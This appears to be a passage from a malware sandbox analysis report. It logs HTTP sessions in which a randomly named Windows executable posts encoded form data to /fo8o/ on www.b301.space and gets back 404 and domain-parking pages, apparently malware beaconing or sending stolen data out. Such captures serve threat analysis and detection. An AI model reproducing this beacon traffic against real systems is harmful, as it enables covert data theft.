Jun 26, 2024 14:58:29.165337086 CEST	421	IN	Data Raw: 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 53 69 74 65 6d 61 70 20 e5 9c b0 e5 9b be 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 Data Ascii: et="_blank">Sitemap </a></div><script> (function(){var bp = document.createElement('script');var curProtocol = window.location.protocol.split(':')[0];if (curProtocol === 'https') {bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';}el

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	65259	194.58.112.174	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:58:34.227560997 CEST	766	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.b301.space Origin: http://www.b301.space Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.b301.space/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 4e 57 66 33 62 5a 52 6f 59 45 75 4a 37 70 55 4e 41 44 38 34 4b 70 64 35 32 47 7a 54 71 76 67 75 33 31 66 65 75 62 46 52 76 45 65 4f 41 68 4a 4b 75 79 37 2b 30 31 4f 33 37 41 38 46 68 74 6e 4d 6d 46 50 4d 2f 50 67 57 47 55 78 53 31 55 38 76 46 65 6d 61 61 78 6b 73 37 6b 63 48 73 4f 78 57 62 70 49 79 4c 6a 35 38 48 72 2b 75 4e 6a 51 67 77 6b 44 6e 63 39 44 44 6e 46 73 59 75 2f 4e 47 4e 2b 50 75 56 33 4c 54 79 6e 71 66 47 38 76 42 63 31 56 5a 6b 5a 48 4c 62 66 45 30 36 48 42 56 48 76 48 76 61 6f 67 68 32 41 72 6b 62 51 6b 59 4d 68 35 39 42 52 4a 42 6f 39 6b 63 79 30 63 64 6b 31 4d 54 47 58 67 3d Data Ascii: Y8F=NWf3bZRoYEuJ7pUNAD84Kpd52GzTqvgu31feubFRvEeOAhJKuy7+01O37A8FhtnMmFPM/PgWGUxS1U8vFemaaxks7kcHsOxWbpIyLj58Hr+uNjQgwkDnc9DDnFsYu/NGN+PuV3LTynqfG8vBc1VZkZHLbfE06HBVHvHvaogh2ArkbQkYMh59BRJBo9kcy0cdk1MTGXg=
Jun 26, 2024 14:58:34.942014933 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Jun 2024 12:58:34 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 33 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b d7 11 fd ee 5f 71 cd 02 22 69 73 77 25 3b 29 6c 8b a4 e2 d8 69 bf 38 49 01 39 2d 0a c5 21 2e 97 57 e4 5a cb 5d 76 77 29 99 b1 0d 24 76 9e 88 11 23 69 80 16 41 df 45 d1 4f 05 6c d9 6a 14 3f e4 bf b0 fb 8f 7a 66 ee ee 72 49 91 b2 fc 48 1a 01 92 c8 fb 9c 3b 73 e6 cc dc 47 fd 68 c7 b7 a3 d1 40 89 5e d4 77 9b 75 fa 2b 6c 57 86 61 a3 e4 84 2d d9 91 83 c8 d9 54 25 e1 4a af db 28 05 c3 12 da 28 d9 69 d6 fb 2a 92 c2 ee c9 20 54 51 a3 f4 ce c5 5f 18 a7 50 c7 a5 9e ec ab 46 69 20 83 0d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 68 04 18 73 b2 e5 a6 a3 b6 06 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 84 21 22 27 72 55 73 6b 6b cb 6c 9f 5c 5c 32 c3 81 b4 55 dd d2 a5 75 d7 f1 36 44 a0 dc 46 29 8c 46 ae 0a 7b 4a 61 82 be ea 38 b2 51 92 ae 5b 12 bd 40 ad e7 62 b2 58 86 1c 46 be 69 87 21 06 1f f7 77 b0 80 ac f5 ba 84 44 be 67 e2 cf ca 52 49 90 e6 a0 a8 be ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 41 d4 b4 8e d5 8f ae 9d 3b 7f f6 [TRUNCATED] Data Ascii: e30Zko_q"isw%;)li8I9-!.WZ]vw)$v#iAEOlj?zfrIH;sGh@^wu+lWa-T%J((i* TQ_PFi {(P`hs~n9MV995B[!"'rUskkl\\2Uu6DF)F{Ja8Q[@bXFi!wDgRIA;c-[fH{c\eG4#X.]jV:H:=TV_z#rX^CM,ORq #0Zg>\4ZNEHmQ1"Rr#v\KqqV%zgsnW#)RW0QM?w".\|>w/PuAAxv&W;o(Y]rVaF%uhUVV x/6b0}a$#fOvZkc"SCic^'}v+A3'l8Q{ai`~])Wy6,UKj3k.m&Nji)kY[=B$g/`[?l&'6.5C}RrL<x%/3G)XVQ?lJn2g2/PH5B(0K07^irS38Zp<D8oNBE5xhG3SXlN#wxRS,}/nDo [TRUNCATED]
Jun 26, 2024 14:58:34.942074060 CEST	1236	IN	Data Raw: 68 fb 74 d6 b1 f9 0b 74 ea 1a 7d f8 b0 e3 b5 5c b5 1e 19 da 9f 31 61 14 f8 5e f7 e9 46 01 f7 02 ee 36 85 ae 7f 01 bd 88 53 50 ef e3 f8 1e 70 c6 23 4c 70 eb b4 db 6a e5 84 c3 b6 36 79 2e 49 db 07 cb f5 11 19 3d 85 71 ff 8c 78 77 3f f9 0a 2e f2 38 Data Ascii: htt}\1a^F6SPp#Lpj6y.I=qxw?.8"^z7BF[ y[ u%at7^]9p`G5.0MN[smr'X-_V!? 3&G9_5x`j?sB\| .E$3i
Jun 26, 2024 14:58:34.942111969 CEST	448	IN	Data Raw: 4a 64 b8 ff 24 b2 64 8e 03 55 e9 d8 2b f2 d4 33 85 16 27 da f3 81 98 ed b9 39 65 05 d9 51 28 a7 e0 5f 4c 5a 91 24 73 2a c0 59 70 e1 28 02 cd 91 02 83 c3 1f 81 37 3f e3 10 8f 3d 2c 83 1c f2 1c 15 f1 b7 dc 0d 60 d6 f9 05 28 bb 86 7d 71 be 71 a6 a4 Data Ascii: Jd$dU+3'9eQ(_LZ$sYp(7?=,`(}qq!6oc=r?;}d"~R8:zYptj,?t'Vx&+Co>pJCTp{=.=J\Aofe.KJwd$+z(8"{F\4j*&Q@[\|
Jun 26, 2024 14:58:34.942142963 CEST	898	IN	Data Raw: fb 16 9e 23 54 ca d4 ae 5c 5d 5b bc 34 96 50 0f 68 e2 de 1b dd cb d9 19 53 ea 34 79 90 62 1f b6 30 68 4b 5f 0a b5 08 f6 2b e9 e7 59 b7 59 01 ee 7c 58 2d 6f ca a8 67 d2 37 bf 5f a9 42 4d e5 05 3c 5d 70 db 78 01 d0 d0 9e 55 b0 48 2a 8b 0c 47 1e 49 Data Ascii: #T\][4PhS4yb0hK_+YY\|X-og7_BM<]pxUHGI47V!1dK1MZ}xa]hlQOs:\|kH'!excQ~eQv<\S_D/+D6 9V-qR<k^:]0A5 :M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	65260	194.58.112.174	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:58:36.761331081 CEST	786	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.b301.space Origin: http://www.b301.space Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.b301.space/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 4e 57 66 33 62 5a 52 6f 59 45 75 4a 36 4e 6f 4e 4d 41 6b 34 62 35 64 34 71 32 7a 54 67 50 67 71 33 31 62 65 75 65 6f 4d 73 79 4f 4f 4f 6b 74 4b 74 33 48 2b 31 31 4f 33 6a 77 38 4d 73 4e 6e 35 6d 46 44 75 2f 4b 59 57 47 53 64 53 31 57 30 76 46 70 79 56 62 68 6b 71 69 30 63 46 69 75 78 57 62 70 49 79 4c 6a 74 57 48 71 57 75 4d 58 55 67 77 47 72 6b 56 64 44 43 7a 56 73 59 71 2f 4e 43 4e 2b 50 59 56 31 2b 45 79 6c 53 66 47 39 66 42 63 67 30 50 74 5a 48 4a 52 2f 45 6c 35 45 70 52 42 76 53 6b 57 71 4a 46 33 44 57 66 54 47 4a 79 57 44 78 56 53 78 6c 35 34 75 73 72 6a 45 39 30 2b 57 63 6a 59 41 30 4c 72 33 4c 76 5a 70 6a 37 69 31 51 35 33 2f 61 4f 51 46 6b 52 Data Ascii: Y8F=NWf3bZRoYEuJ6NoNMAk4b5d4q2zTgPgq31beueoMsyOOOktKt3H+11O3jw8MsNn5mFDu/KYWGSdS1W0vFpyVbhkqi0cFiuxWbpIyLjtWHqWuMXUgwGrkVdDCzVsYq/NCN+PYV1+EylSfG9fBcg0PtZHJR/El5EpRBvSkWqJF3DWfTGJyWDxVSxl54usrjE90+WcjYA0Lr3LvZpj7i1Q53/aOQFkR
Jun 26, 2024 14:58:37.447815895 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Jun 2024 12:58:37 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 33 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b d7 11 fd ee 5f 71 cd 02 22 69 73 77 25 3b 29 6c 8b a4 e2 d8 69 bf 38 49 01 39 2d 0a c5 21 2e 97 57 e4 5a cb 5d 76 77 29 99 b1 0d 24 76 9e 88 11 23 69 80 16 41 df 45 d1 4f 05 6c d9 6a 14 3f e4 bf b0 fb 8f 7a 66 ee ee 72 49 91 b2 fc 48 1a 01 92 c8 fb 9c 3b 73 e6 cc dc 47 fd 68 c7 b7 a3 d1 40 89 5e d4 77 9b 75 fa 2b 6c 57 86 61 a3 e4 84 2d d9 91 83 c8 d9 54 25 e1 4a af db 28 05 c3 12 da 28 d9 69 d6 fb 2a 92 c2 ee c9 20 54 51 a3 f4 ce c5 5f 18 a7 50 c7 a5 9e ec ab 46 69 20 83 0d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 68 04 18 73 b2 e5 a6 a3 b6 06 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 84 21 22 27 72 55 73 6b 6b cb 6c 9f 5c 5c 32 c3 81 b4 55 dd d2 a5 75 d7 f1 36 44 a0 dc 46 29 8c 46 ae 0a 7b 4a 61 82 be ea 38 b2 51 92 ae 5b 12 bd 40 ad e7 62 b2 58 86 1c 46 be 69 87 21 06 1f f7 77 b0 80 ac f5 ba 84 44 be 67 e2 cf ca 52 49 90 e6 a0 a8 be ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 41 d4 b4 8e d5 8f ae 9d 3b 7f f6 [TRUNCATED] Data Ascii: e30Zko_q"isw%;)li8I9-!.WZ]vw)$v#iAEOlj?zfrIH;sGh@^wu+lWa-T%J((i* TQ_PFi {(P`hs~n9MV995B[!"'rUskkl\\2Uu6DF)F{Ja8Q[@bXFi!wDgRIA;c-[fH{c\eG4#X.]jV:H:=TV_z#rX^CM,ORq #0Zg>\4ZNEHmQ1"Rr#v\KqqV%zgsnW#)RW0QM?w".\|>w/PuAAxv&W;o(Y]rVaF%uhUVV x/6b0}a$#fOvZkc"SCic^'}v+A3'l8Q{ai`~])Wy6,UKj3k.m&Nji)kY[=B$g/`[?l&'6.5C}RrL<x%/3G)XVQ?lJn2g2/PH5B(0K07^irS38Zp<D8oNBE5xhG3SXlN#wxRS,}/nDo [TRUNCATED]
Jun 26, 2024 14:58:37.447874069 CEST	224	IN	Data Raw: 68 fb 74 d6 b1 f9 0b 74 ea 1a 7d f8 b0 e3 b5 5c b5 1e 19 da 9f 31 61 14 f8 5e f7 e9 46 01 f7 02 ee 36 85 ae 7f 01 bd 88 53 50 ef e3 f8 1e 70 c6 23 4c 70 eb b4 db 6a e5 84 c3 b6 36 79 2e 49 db 07 cb f5 11 19 3d 85 71 ff 8c 78 77 3f f9 0a 2e f2 38 Data Ascii: htt}\1a^F6SPp#Lpj6y.I=qxw?.8"^z7BF[ y[ u%at7^]9p`G5.0MN[smr'X-_V!? 3&G9_5x`j?sB
Jun 26, 2024 14:58:37.447910070 CEST	1236	IN	Data Raw: 7c 84 15 ed c4 0f 20 db 2e 16 82 45 24 b7 05 a5 33 69 01 12 1c 76 cc b4 82 22 26 2d 78 07 ff 1f d0 1a b3 50 0a 0d 24 9f b2 16 d8 97 a1 a5 f8 7b a8 05 6d 7f f8 f5 fe 1b 73 93 35 18 8c 07 ad f6 4f c9 17 a9 59 ef b1 35 d3 65 32 09 ed c4 8f 90 c1 41 Data Ascii: \| .E$3iv"&-xP${ms5OY5e2Am,bkci+1c-OX%(_X5,i @HF4dc`Fs]:m35RrKG!1.prH[-Im0
Jun 26, 2024 14:58:37.447946072 CEST	1122	IN	Data Raw: 34 e0 6a a0 2a 26 1b 51 fb 40 e1 b4 cd 5b 9e e8 7c fd c8 c4 d7 f1 58 b8 a8 68 39 9d 99 e3 6c ca 40 d0 19 7f 88 2b 53 5c 59 0f fb b8 40 32 7f 37 54 c1 68 55 b9 20 7d 3f 38 eb ba 15 51 96 65 51 9d 9c 8d a4 58 f7 03 c8 4b 63 38 e8 bf b8 8c 7f 75 3d Data Ascii: 4j&Q@[\|Xh9l@+S\Y@27ThU }?8QeQXKc8u=Pr,7%.MzR&)6ub(/KNjr~9'<iqm+>1~dY7\Eur!tn0>#T\][4Ph

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	65261	194.58.112.174	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:58:39.305389881 CEST	1803	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.b301.space Origin: http://www.b301.space Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.b301.space/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 4e 57 66 33 62 5a 52 6f 59 45 75 4a 36 4e 6f 4e 4d 41 6b 34 62 35 64 34 71 32 7a 54 67 50 67 71 33 31 62 65 75 65 6f 4d 73 79 47 4f 4f 57 6c 4b 75 51 54 2b 76 31 4f 33 39 41 38 42 73 4e 6e 6b 6d 46 62 71 2f 4b 6b 6f 47 58 42 53 30 31 73 76 55 6f 79 56 52 68 6b 71 71 55 63 59 73 4f 78 6d 62 6f 6b 2b 4c 6a 39 57 48 71 57 75 4d 52 34 67 35 30 44 6b 54 64 44 44 6e 46 73 45 75 2f 4e 71 4e 2b 47 74 56 31 71 55 79 56 79 66 46 64 50 42 65 55 55 50 6d 5a 48 48 57 2f 46 34 35 45 30 50 42 75 2f 62 57 71 52 72 33 44 2b 66 44 78 34 49 47 7a 67 4a 48 52 46 46 7a 73 41 4e 2f 69 70 50 31 33 30 75 59 51 55 6c 71 30 6e 43 62 63 44 70 71 58 6c 76 69 62 36 2f 41 77 74 36 38 6b 35 52 7a 72 52 4e 57 42 56 38 35 31 35 46 6d 4e 58 4e 4c 48 56 66 75 56 6d 75 65 44 66 39 75 42 6a 2b 6e 4c 61 57 47 32 78 38 61 78 50 49 72 4e 76 70 6a 30 37 74 47 75 42 5a 32 76 67 33 42 54 65 71 76 4a 6a 62 49 43 48 42 4c 78 63 31 64 52 4f 30 6d 49 47 41 30 59 78 51 36 44 54 39 43 73 42 4b 39 7a 37 67 53 57 6c 75 6b 7a 76 44 4e 64 [TRUNCATED] Data Ascii: Y8F=NWf3bZRoYEuJ6NoNMAk4b5d4q2zTgPgq31beueoMsyGOOWlKuQT+v1O39A8BsNnkmFbq/KkoGXBS01svUoyVRhkqqUcYsOxmbok+Lj9WHqWuMR4g50DkTdDDnFsEu/NqN+GtV1qUyVyfFdPBeUUPmZHHW/F45E0PBu/bWqRr3D+fDx4IGzgJHRFFzsAN/ipP130uYQUlq0nCbcDpqXlvib6/Awt68k5RzrRNWBV8515FmNXNLHVfuVmueDf9uBj+nLaWG2x8axPIrNvpj07tGuBZ2vg3BTeqvJjbICHBLxc1dRO0mIGA0YxQ6DT9CsBK9z7gSWlukzvDNdbAc9Hp4JYr3gsF8K1PJV+BLIioLUlFgXEybi/uKfL415EDpAeYztIY0Gj0FpYK0knVupK8tOdBHRl52TLQAxatUuhh/E7/FEWucPD4lvyeCuQdmrowe/axWROYrKkF6o2s+B/tyK59QtqDHKLNzE5bgHdvrDDv/NyIUZQdKTX0g1+Luky/laT03b+9hPNoNLJHur16743Eixg60p14aIkKxhsPnbJev+pyyfcXwoluo5YQkD9cEp+d7wq78eCSHcfLj1bqiMLfjfXPczsu5R/EWJTYaeILv34x0wVjwTlWD1PEvWUtLBDilQeSuykkxFNSIWHlkpd8VreQdvWiD2jF6APCHQGjGVTk4fNMMDylG8kYM4LNtQVjyzY+89XeBj4WSuN/M+0g9/J0axLwAzKAJ4F0jkgbX2ev75y0uao9PR01l7FkqJSBQy5Y0twJz6uVHNaxUQd0xYfDOphdZGH0tpv+Wo+SwD+4S+THXsZyYrG5bkSHBvOXVTriBzicG9zJsA/vruwzKDesu7E1mMWu/o4XBKVKr3pLuR2hq/PgiBS9o13NvkyoBR1gx18+s+pw8BKrCfCkLAgD0c0Gmp+mHxoJc+6aitkMGO1fV+vzucy2/Vz+Vf47SsUOu90YmyfZ5cImcZELWtZSN6x7lOKaFQyYKiZHmT6Z [TRUNCATED]
Jun 26, 2024 14:58:40.000155926 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Jun 2024 12:58:39 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 33 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b d7 11 fd ee 5f 71 cd 02 22 69 73 77 25 3b 29 6c 8b a4 e2 d8 69 bf 38 49 01 39 2d 0a c5 21 2e 97 57 e4 5a cb 5d 76 77 29 99 b1 0d 24 76 9e 88 11 23 69 80 16 41 df 45 d1 4f 05 6c d9 6a 14 3f e4 bf b0 fb 8f 7a 66 ee ee 72 49 91 b2 fc 48 1a 01 92 c8 fb 9c 3b 73 e6 cc dc 47 fd 68 c7 b7 a3 d1 40 89 5e d4 77 9b 75 fa 2b 6c 57 86 61 a3 e4 84 2d d9 91 83 c8 d9 54 25 e1 4a af db 28 05 c3 12 da 28 d9 69 d6 fb 2a 92 c2 ee c9 20 54 51 a3 f4 ce c5 5f 18 a7 50 c7 a5 9e ec ab 46 69 20 83 0d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 68 04 18 73 b2 e5 a6 a3 b6 06 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 84 21 22 27 72 55 73 6b 6b cb 6c 9f 5c 5c 32 c3 81 b4 55 dd d2 a5 75 d7 f1 36 44 a0 dc 46 29 8c 46 ae 0a 7b 4a 61 82 be ea 38 b2 51 92 ae 5b 12 bd 40 ad e7 62 b2 58 86 1c 46 be 69 87 21 06 1f f7 77 b0 80 ac f5 ba 84 44 be 67 e2 cf ca 52 49 90 e6 a0 a8 be ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 41 d4 b4 8e d5 8f ae 9d 3b 7f f6 [TRUNCATED] Data Ascii: e30Zko_q"isw%;)li8I9-!.WZ]vw)$v#iAEOlj?zfrIH;sGh@^wu+lWa-T%J((i* TQ_PFi {(P`hs~n9MV995B[!"'rUskkl\\2Uu6DF)F{Ja8Q[@bXFi!wDgRIA;c-[fH{c\eG4#X.]jV:H:=TV_z#rX^CM,ORq #0Zg>\4ZNEHmQ1"Rr#v\KqqV%zgsnW#)RW0QM?w".\|>w/PuAAxv&W;o(Y]rVaF%uhUVV x/6b0}a$#fOvZkc"SCic^'}v+A3'l8Q{ai`~])Wy6,UKj3k.m&Nji)kY[=B$g/`[?l&'6.5C}RrL<x%/3G)XVQ?lJn2g2/PH5B(0K07^irS38Zp<D8oNBE5xhG3SXlN#wxRS,}/nDo [TRUNCATED]
Jun 26, 2024 14:58:40.000200987 CEST	1236	IN	Data Raw: 68 fb 74 d6 b1 f9 0b 74 ea 1a 7d f8 b0 e3 b5 5c b5 1e 19 da 9f 31 61 14 f8 5e f7 e9 46 01 f7 02 ee 36 85 ae 7f 01 bd 88 53 50 ef e3 f8 1e 70 c6 23 4c 70 eb b4 db 6a e5 84 c3 b6 36 79 2e 49 db 07 cb f5 11 19 3d 85 71 ff 8c 78 77 3f f9 0a 2e f2 38 Data Ascii: htt}\1a^F6SPp#Lpj6y.I=qxw?.8"^z7BF[ y[ u%at7^]9p`G5.0MN[smr'X-_V!? 3&G9_5x`j?sB\| .E$3i
Jun 26, 2024 14:58:40.000238895 CEST	1236	IN	Data Raw: 4a 64 b8 ff 24 b2 64 8e 03 55 e9 d8 2b f2 d4 33 85 16 27 da f3 81 98 ed b9 39 65 05 d9 51 28 a7 e0 5f 4c 5a 91 24 73 2a c0 59 70 e1 28 02 cd 91 02 83 c3 1f 81 37 3f e3 10 8f 3d 2c 83 1c f2 1c 15 f1 b7 dc 0d 60 d6 f9 05 28 bb 86 7d 71 be 71 a6 a4 Data Ascii: Jd$dU+3'9eQ(_LZ$sYp(7?=,`(}qq!6oc=r?;}d"~R8:zYptj,?t'Vx&+Co>pJCTp{=.=J\Aofe.KJwd$+z(8"{F\4j*&Q@[\|
Jun 26, 2024 14:58:40.000268936 CEST	110	IN	Data Raw: 16 b2 55 a1 16 c7 09 9b 4e e8 07 5c c4 e3 5e 2f 1a d9 f3 b3 e0 c5 b9 b3 d3 ef ea 17 68 33 57 b2 45 21 cc ca e4 c5 5b 35 3a ae c6 e3 3d 1f 8e 85 77 39 67 64 3b f4 dd 61 a4 96 05 5d 7a 9c 31 4e e3 67 70 65 b9 24 a4 8b e7 4c e4 08 3a 41 1f 4f 4a 18 Data Ascii: UN\^/h3WE![5:=w9gd;a]z1Ngpe$L:AOJE]D.')0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	65262	194.58.112.174	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:58:41.838344097 CEST	513	OUT	GET /fo8o/?Y8F=AU3XYvZFaGSlytwuLg8MPaUQqx3yoZo+slWhncsJrkz7OmZN7i/xsh6l91syvPfChHr514cSZiYi12sQUpLBMWUTkQYjuMJYaMZeWEVjYdmGCyAvzXT+cvLf21wqhucucw==&9brL_=BThPe0S0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.b301.space Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 26, 2024 14:58:42.535288095 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Jun 2024 12:58:42 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 32 39 32 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 62 33 30 31 2e 73 70 61 63 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 [TRUNCATED] Data Ascii: 2927<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.b301.space</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/<![CDATA[/window.trackScriptLoad = function(){};/.../</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text">  <a class="b-link" href="https://reg.ru" re [TRUNCATED]
Jun 26, 2024 14:58:42.535347939 CEST	1236	IN	Data Raw: 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 Data Ascii: class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.b301.space</h1><p class="b-parking__header-descrip
Jun 26, 2024 14:58:42.535382986 CEST	1236	IN	Data Raw: d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 74 65 6d 20 62 2d 70 61 72 6b Data Ascii: .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_type_hosting"></span><div c
Jun 26, 2024 14:58:42.535417080 CEST	1236	IN	Data Raw: 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 22 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 5f 70 72 69 6d 61 72 79 20 62 2d 62 75 74 74 6f 6e 5f 73 74 79 6c 65 Data Ascii: -parking__button-wrapper"><a class="b-button b-button_color_primary b-button_style_wide b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_hosting" href="https://www.reg.ru/hosting/?utm_source=www.b
